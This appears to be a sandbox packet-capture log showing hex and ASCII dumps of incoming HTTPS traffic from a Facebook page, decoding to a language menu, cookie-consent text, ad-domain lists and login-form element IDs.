2022-10-07 13:58:41 UTC	127	IN	Data Raw: 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 2c 20 66 75 6e 63 74 69 6f 6e 28 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 29 20 7b 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 2e 6c 6f 61 64 4f 6e 44 4f 4d 43 6f 6e 74 65 6e 74 52 65 61 64 79 28 5b 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 5c 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 49 61 52 5c 2f 36 Data Ascii: script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","n6W4xMH","h3ZzAmG","dAxX0jj","cYU3c32","D1\/JTmT","Z2GjVu9","\/rO0lbn","lWOvGTa","diogVau","IaR\/6
2022-10-07 13:58:41 UTC	128	IN	Data Raw: 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 61 64 2e 61 74 64 6d 74 2e 63 6f 6d 22 2c 22 61 64 66 6f 72 6d 2e 6e 65 74 22 2c 22 61 64 31 33 2e 61 64 66 61 72 6d 31 2e 61 64 69 74 69 6f 6e 2e 63 6f 6d 22 2c 22 69 6c 6f 76 65 6d 79 66 72 65 65 64 6f 6d 73 2e 63 6f 6d 22 2c 22 73 65 63 75 72 65 2e 61 64 6e 78 73 2e 63 6f 6d 22 5d 2c 22 69 73 5f 6d 6f 62 69 6c 65 5f 64 65 76 69 63 65 22 3a 66 61 6c 73 65 7d 2c 32 37 5d 5d 2c 22 69 6e 73 74 61 6e 63 65 73 22 3a 5b 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 63 4d 22 2c 5b 22 53 65 6c 65 63 74 61 62 6c 65 4d 65 6e 75 22 2c 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 Data Ascii: "ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"instances":[["__inst_02182015_0_0_cM",["SelectableMenu","MenuSelectableI
2022-10-07 13:58:41 UTC	130	IN	Data Raw: 39 5f 30 5f 31 5f 59 49 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 65 5f 44 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 39 4c 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 65 75 74 73 63 68 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b Data Ascii: 9_0_1_YI"},"label":"Dansk","title":"","className":"headerItem"},{"class":"headerItem","value":"de_DE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_2_9L"},"label":"Deutsch","title":"","className":"headerItem"},{
2022-10-07 13:58:41 UTC	131	IN	Data Raw: 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 77 30 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4d 61 67 79 61 72 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 6c 5f 4e 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 Data Ascii: tor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_9_w0"},"label":"Magyar","title":"","className":"headerItem"},{"class":"headerItem","value":"nl_NL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c0
2022-10-07 13:58:41 UTC	132	IN	Data Raw: 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 73 76 5f 53 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 69 33 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 76 65 6e 73 6b 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 76 69 5f 56 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 Data Ascii: e":"headerItem"},{"class":"headerItem","value":"sv_SE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_h_i3"},"label":"Svenska","title":"","className":"headerItem"},{"class":"headerItem","value":"vi_VN","selected"
2022-10-07 13:58:41 UTC	134	IN	Data Raw: 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 45 61 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 Data Ascii: ,"value":"ar_AR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_o_Ea"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":fa
2022-10-07 13:58:41 UTC	135	IN	Data Raw: 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 42 47 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 41 34 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 Data Ascii: value":"ko_KR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_v_BG"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_A4","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className"
2022-10-07 13:58:41 UTC	136	IN	Data Raw: 36 35 33 64 0d 0a 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 39 38 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 48 6c 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75 74 6f 68 69 64 65 22 3a 6e 75 6c 6c 2c 22 74 69 74 6c 65 49 44 22 3a 6e 75 6c 6c 2c 22 Data Ascii: 653deight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_98",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_Hl","HTML"],[{"width":680,"autohide":null,"titleID":null,"
2022-10-07 13:58:41 UTC	137	IN	Data Raw: 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 33 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 37 63 38 66 34 61 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 69 47 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c 22 20 68 72 65 66 3d 5c 22 23 5c 22 20 73 74 79 6c 65 3d 5c 22 6d 61 78 2d Data Ascii: _9xl2\">\u003Cdiv class=\"_9xl3\">\u003Ci class=\"img sp_2myvABqqKqq sx_7c8f4a\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_iG\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\" href=\"#\" style=\"max-
2022-10-07 13:58:41 UTC	139	IN	Data Raw: 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 Data Ascii: Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u00
2022-10-07 13:58:41 UTC	140	IN	Data Raw: 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 6f 20 73 68 6f 77 20 79 6f 75 20 62 65 74 74 65 72 20 61 64 73 2c 20 77 65 20 75 73 65 20 64 61 74 61 20 74 68 61 74 20 61 64 76 65 72 74 69 73 65 72 Data Ascii: lass=\"_9o-m\">If you have a Facebook account, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\"_9si-\">Ad settings\u003C\/p>\u003Cp class=\"_9o-m\">To show you better ads, we use data that advertiser
2022-10-07 13:58:41 UTC	141	IN	Data Raw: 69 72 20 61 70 70 73 20 6f 72 20 77 65 62 73 69 74 65 73 2e 20 54 68 65 79 20 75 73 65 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e 20 6f 72 20 46 61 63 65 62 6f 6f 6b 20 50 69 78 65 6c 2c 20 74 6f 20 73 68 61 72 65 20 74 68 69 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 20 75 73 2e 20 54 68 69 73 20 68 65 6c 70 73 20 75 73 20 64 6f 20 74 68 69 6e 67 73 20 73 75 63 68 20 61 73 20 67 69 76 65 20 79 6f 75 20 61 20 6d 6f 72 65 20 70 65 Data Ascii: ir apps or websites. They use our \u003Ca href=\"https:\/\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login or Facebook Pixel, to share this information with us. This helps us do things such as give you a more pe
2022-10-07 13:58:41 UTC	143	IN	Data Raw: 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 71 31 78 58 71 62 42 34 50 38 76 59 33 73 61 48 75 77 72 6f 43 38 37 38 32 5f 70 5a 35 76 61 7a 37 41 32 45 6c 58 38 41 65 61 67 55 41 65 6e 55 6e 72 5f 76 4a 67 41 49 56 35 54 75 38 54 52 5f 65 33 35 4f 71 53 75 68 66 48 32 58 7a 2d 66 50 36 6b 38 67 64 39 61 57 45 47 30 41 4d 62 5a 35 42 71 6c 58 78 61 58 58 52 38 56 6b 73 59 64 6e 41 6f 32 33 50 4f 33 6f 45 31 74 32 2d 6f 66 4b 2d 6c 71 61 31 38 58 4c 50 45 78 6a 56 56 4c 4e 63 66 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 Data Ascii: hp?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&h=AT1q1xXqbB4P8vY3saHuwroC8782_pZ5vaz7A2ElX8AeagUAenUnr_vJgAIV5Tu8TR_e35OqSuhfH2Xz-fP6k8gd9aWEG0AMbZ5BqlXxaXXR8VksYdnAo23PO3oE1t2-ofK-lqa18XLPExjVVLNcfg\" target=\"_blank\" rel=\"nofollow\" da
2022-10-07 13:58:41 UTC	144	IN	Data Raw: 72 64 55 37 36 45 35 6a 31 46 70 74 59 62 49 46 75 30 75 77 33 6e 46 4b 38 4a 72 79 75 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 Data Ascii: rdU76E5j1FptYbIFu0uw3nFK8JryuA\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&a
2022-10-07 13:58:41 UTC	146	IN	Data Raw: 74 68 61 74 20 61 6c 6c 6f 77 20 79 6f 75 20 74 6f 20 63 68 6f 6f 73 65 20 77 68 65 74 68 65 72 20 62 72 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20 6d 61 6b 65 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 68 6f 77 20 74 68 65 79 20 77 6f 72 6b 20 61 74 20 61 6e 79 20 74 69 6d 65 2e 20 41 73 20 6f 66 20 35 20 4f 63 74 6f 62 65 72 20 32 30 32 30 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e Data Ascii: that allow you to choose whether browser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time. As of 5 October 2020, you may find additional in
2022-10-07 13:58:41 UTC	147	IN	Data Raw: 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 5c 75 30 30 32 35 32 46 65 6e 2d 55 53 5c 75 30 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 33 45 76 57 6c 63 33 58 6a 33 33 64 44 41 47 69 53 48 54 34 77 51 56 5f 58 2d 56 4d 47 47 54 4c 39 46 67 5a 5f 6d 54 63 46 47 34 74 4e 6e 79 70 62 66 6b 42 66 5a 70 59 36 70 4f 57 77 62 31 41 45 65 36 6c 59 41 4b 76 63 77 2d 77 62 79 63 74 71 7a 6d 72 5a 56 71 4d 5f 6e 44 53 4c 56 79 71 77 35 30 62 77 76 54 43 39 45 46 63 59 73 66 48 68 37 57 57 66 47 58 50 66 31 74 4d 67 69 67 46 76 38 39 75 4d 42 78 37 71 58 66 4b 64 Data Ascii: F\u00252Fsupport.mozilla.org\u00252Fen-US\u00252Fkb\u00252Fenable-and-disable-cookies-website-preferences&h=AT3EvWlc3Xj33dDAGiSHT4wQV_X-VMGGTL9FgZ_mTcFG4tNnypbfkBfZpY6pOWwb1AEe6lYAKvcw-wbyctqzmrZVqM_nDSLVyqw50bwvTC9EFcYsfHh7WWfGXPf1tMgigFv89uMBx7qXfKd
2022-10-07 13:58:41 UTC	149	IN	Data Raw: 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 35 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 5c 22 31 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 39 Data Ascii: target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo5\">\u003Cbutton value=\"1\" class=\"_42ft _4jy0 _9
2022-10-07 13:58:41 UTC	150	IN	Data Raw: 33 31 30 63 30 37 39 5f 30 5f 62 5f 52 4f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4e 6f 72 73 6b 20 28 62 6f 6b 6d 5c 75 30 30 65 35 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 4b 6c 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 6c 73 6b 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 30 33 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 42 72 61 73 69 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 37 45 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 50 6f 72 74 75 67 75 5c 75 30 30 65 61 73 20 28 50 6f 72 74 75 67 61 6c 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 Data Ascii: 310c079_0_b_RO",{"__html":"Norsk (bokm\u00e5l)"},1],["__markup_3310c079_0_c_Kl",{"__html":"Polski"},1],["__markup_3310c079_0_d_03",{"__html":"Portugu\u00eas (Brasil)"},1],["__markup_3310c079_0_e_7E",{"__html":"Portugu\u00eas (Portugal)"},1],["__markup_331
2022-10-07 13:58:41 UTC	152	IN	Data Raw: 65 6c 65 6d 5f 39 34 63 31 35 33 38 35 5f 30 5f 30 5f 54 2b 22 2c 22 75 5f 30 5f 31 5f 76 71 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 61 6c 22 2c 22 75 5f 30 5f 32 5f 4c 58 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 53 57 22 2c 22 6c 6f 67 69 6e 5f 66 6f 72 6d 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 54 39 22 2c 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 72 62 22 2c 22 75 5f 30 5f 33 5f 50 39 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 77 69 22 2c 22 75 5f 30 5f 34 5f 41 42 22 2c 31 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 Data Ascii: elem_94c15385_0_0_T+","u_0_1_vq",1],["__elem_a588f507_0_3_al","u_0_2_LX",1],["__elem_835c633a_0_0_SW","login_form",1],["__elem_45d73b5d_0_2_T9","loginbutton",1],["__elem_f46f4946_0_0_rb","u_0_3_P9",1],["__elem_f46f4946_0_1_wi","u_0_4_AB",1],["__elem_a588f
